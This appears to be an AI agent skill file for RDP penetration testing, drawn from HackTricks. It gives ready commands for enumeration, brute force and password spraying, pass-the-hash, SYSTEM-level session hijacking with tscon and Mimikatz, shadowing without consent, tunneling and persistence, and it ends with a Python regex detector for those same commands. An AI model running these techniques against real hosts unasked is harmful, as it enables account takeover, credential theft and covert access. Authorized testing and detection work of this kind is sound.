Hacktricks-skills rdp-pentesting

How to enumerate, attack, and exploit RDP (Remote Desktop Protocol) services during penetration testing. Use this skill whenever the user mentions RDP, port 3389, remote desktop, Windows remote access, RDP enumeration, RDP brute force, RDP shadowing, session hijacking, or any RDP-related security testing. This skill covers nmap enumeration, credential testing, session stealing, RDP shadowing attacks, virtual channel tunneling, and post-exploitation techniques.

Install: clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/network-services-pentesting/pentesting-rdp/SKILL.MD

Source content

RDP Pentesting Skill

This skill guides you through Remote Desktop Protocol (RDP) security testing, from initial enumeration through exploitation and post-exploitation.

Quick Reference

  • Default Port: 3389/tcp
  • Service Name: ms-wbt-server
  • Protocol: Remote Desktop Protocol (Microsoft)

Workflow Overview

  1. Enumerate the RDP service (encryption, vulnerabilities, NLA status)
  2. Test credentials (brute force, password spray, known creds)
  3. Connect with valid credentials
  4. Exploit (session stealing, shadowing, tunneling)
  5. Post-exploitation (persistence, privilege escalation)

1. Enumeration

Automatic Nmap Enumeration

Run this first to gather encryption settings, vulnerability info, and NTLM details:

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

This checks:

  • Available encryption levels
  • MS12-020 DoS vulnerability (without triggering it)
  • NTLM Windows version information

Security Layer and NLA Detection

Determine if Network Level Authentication (NLA) is required and what security layer is in use:

# Encryption and security layer info
nmap --script rdp-enum-encryption -p 3389 <IP>

# Quick authentication check (reports NLA requirement)
nxc rdp <IP> -u <user> -p <password>

# Pre-auth screenshot (only works if NLA is disabled)
nxc rdp <IP> --nla-screenshot

# Authenticated screenshot after valid login
nxc rdp <IP> -u <user> -p <password> --screenshot

Why this matters: with NLA disabled, the server renders the logon screen before any authentication, so pre-authentication screenshots are possible and may reveal sensitive information (logged-on user names, banners, domain names). With NLA enabled, authentication happens before a session is created, so this exposure is closed and the host is likely more hardened overall.


2. Credential Testing

Brute Force (Use with Caution)

Warning: These attacks can lock accounts. Always get authorization and understand the target's lockout policy.

# Crowbar (batch mode)
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'

# Hydra (single target)
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

Password Spraying

Test one password against many users to avoid lockouts:

crowbar -b rdp -s <target_range> -U users.txt -c 'common_password'

Test Known Credentials

If you have credentials from other sources, verify them against RDP:

# Using rdp_check from impacket
rdp_check <domain>/<name>:<password>@<IP>

3. Connection Methods

Basic Connection

# rdesktop (simple)
rdesktop -u <username> <IP>

# rdesktop with domain
rdesktop -d <domain> -u <username> -p <password> <IP>

# xfreerdp (more features)
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>

# Pass-the-hash attack
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP>

4. Session Stealing

Prerequisite: SYSTEM permissions on the target.

You can hijack any active RDP session without knowing the user's password.

List Active Sessions

query user

Hijack a Session

tscon <SESSION_ID> /dest:<SESSIONNAME>

What happens: You'll be inside the user's RDP session with their context. The original user gets disconnected.

Why this is powerful: the stolen session gives you access to:

  • Passwords typed into Notepad (not saved to disk)
  • Other RDP sessions the user has open
  • Browser sessions with saved credentials
  • Any application state in memory

Using Mimikatz

ts::sessions        # List sessions
ts::remote /id:2    # Connect to session ID 2

5. RDP Shadowing (Remote Control)

If Remote Desktop Services shadowing is enabled, you can view or control another user's session.

List Sessions on Remote Host

qwinsta /server:<IP>
quser /server:<IP>

Shadow a Session

# With consent (if policy requires it)
mstsc /v:<IP> /shadow:<SESSION_ID> /control

# Without consent (if policy allows)
mstsc /v:<IP> /shadow:<SESSION_ID> /noconsentprompt /prompt

Check Shadowing Policy

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow

Policy values:

  • 0 = No shadowing
  • 1 = Shadow with consent
  • 2 = Shadow without consent

6. Virtual Channel Tunneling

RDP virtual channels can be abused for pivoting and tunneling.

Using rdp2tcp

# Start FreeRDP with rdp2tcp virtual channel
xfreerdp /u:<user> /v:<IP> /rdp2tcp:/path/to/rdp2tcp/client/rdp2tcp

This multiplexes TCP forwards over the RDP connection, allowing you to tunnel other services through the RDP session.


7. Persistence Techniques

Sticky Keys / Utilman Backdoor

Combine with a sticky keys or utilman backdoor to maintain administrative access. Search for existing backdoors with Sticky-Keys-Slayer: https://github.com/linuz/Sticky-Keys-Slayer

Add User to RDP Group

net localgroup "Remote Desktop Users" <UserLoginName> /add
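Detection logic for the host-side commands used in sections 4, 5 and 7 (tscon /dest:, mstsc /shadow:, net localgroup "Remote Desktop Users" /add, plus the query user / qwinsta discovery step), added here as an example and not part of the original skill. It runs ordered regex rules over constructed process-creation records (the EDR/Sysmon-like field names and the events themselves are assumptions) and escalates a tscon hijack run as SYSTEM, since that is the prerequisite the page states.

```python
import re

# Constructed process-creation records (EDR/Sysmon-like fields are assumed; not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe", "cmd": "notepad.exe C:\\notes.txt"},
    {"host": "WS01", "user": "NT AUTHORITY\\SYSTEM", "cmd": "query user"},
    {"host": "WS01", "user": "NT AUTHORITY\\SYSTEM", "cmd": "tscon 2 /dest:rdp-tcp#0"},
    {"host": "JUMP01", "user": "CORP\\helpdesk",
     "cmd": "mstsc /v:10.0.0.5 /shadow:3 /control /noconsentprompt"},
    {"host": "WS01", "user": "CORP\\jdoe", "cmd": 'net localgroup "Remote Desktop Users" backdoor /add'},
    {"host": "WS02", "user": "CORP\\admin", "cmd": "mstsc /v:srv01"},
]

# Ordered (name, severity, pattern) rules; first match wins (no-consent shadow before generic shadow).
RULES = [
    # tscon <id> /dest:<name> -- session stealing (section 4)
    ("rdp_session_hijack", "high", re.compile(r"(^|\\)tscon(\.exe)?\s+\S+\s+/dest:", re.I)),
    # mstsc /shadow:<id> ... /noconsentprompt -- shadowing without consent (section 5)
    ("rdp_shadow_no_consent", "high",
     re.compile(r"mstsc(\.exe)?\b(?=.*\s/shadow:\d+)(?=.*\s/noconsentprompt)", re.I)),
    ("rdp_shadow", "medium", re.compile(r"mstsc(\.exe)?\b(?=.*\s/shadow:\d+)", re.I)),
    # net localgroup "Remote Desktop Users" <user> /add -- RDP access persistence (section 7)
    ("rdp_group_addition", "medium",
     re.compile(r"net1?(\.exe)?\s+localgroup\s+\"?remote desktop users\"?\s+\S+\s+/add", re.I)),
    # query user / quser / qwinsta -- session discovery that precedes hijacking or shadowing
    ("rdp_session_enumeration", "low", re.compile(r"^(query\s+user|quser|qwinsta)\b", re.I)),
]


def classify(cmdline):
    """Return (rule_name, severity) for the first rule matching a command line, else None."""
    for name, severity, pattern in RULES:
        if pattern.search(cmdline):
            return name, severity
    return None


def detect(events):
    """Run the rules over process-creation records and return one alert dict per hit."""
    alerts = []
    for ev in events:
        hit = classify(ev["cmd"])
        if hit is None:
            continue
        name, severity = hit
        # tscon takes over another user's session without a password only as SYSTEM
        # (the page's prerequisite), so that context is escalated.
        if name == "rdp_session_hijack" and ev["user"].upper().endswith("\\SYSTEM"):
            severity = "critical"
        alerts.append({"host": ev["host"], "user": ev["user"], "rule": name,
                       "severity": severity, "cmd": ev["cmd"]})
    return alerts
```

Feeding real process-creation telemetry into detect() only requires mapping its fields onto host, user and cmd; ordinary mstsc connections and user-initiated reconnects stay silent.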

8. Process Injection

If a higher-privileged user logs in via RDP to a machine where you're admin, you can inject your beacon into their RDP session process.

See:

../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md


9. Automated Tools

AutoRDPwn

Post-exploitation framework for automating RDP shadow attacks:

EvilRDP

Advanced RDP exploitation tool:

  • GitHub: https://github.com/skelsec/evilrdp
  • Features:
    • Automated mouse/keyboard control
    • Clipboard control
    • SOCKS proxy over RDP
    • Execute commands without file upload
    • File transfer even when disabled

SharpRDP

Execute commands without graphical interface:


Common Attack Scenarios

Scenario 1: Initial Access via RDP

  1. Enumerate with nmap scripts
  2. Check if NLA is disabled (easier to exploit)
  3. Test known credentials or spray passwords
  4. Connect and establish persistence

Scenario 2: Lateral Movement

  1. Obtain SYSTEM on one host
  2. Query RDP sessions on other hosts
  3. Use shadowing or session hijacking
  4. Pivot to additional systems

Scenario 3: Credential Harvesting

  1. Hijack active RDP session
  2. Access browser sessions, notepad, other apps
  3. Use Mimikatz for credential dumping
  4. Pass-the-hash to other systems

Safety Notes

  • Always have written authorization before testing RDP services
  • Account lockout policies vary - test in a controlled manner
  • Session hijacking disconnects users - coordinate with stakeholders
  • Shadowing may be logged - be aware of detection
  • Some techniques require SYSTEM - ensure you have appropriate access level

References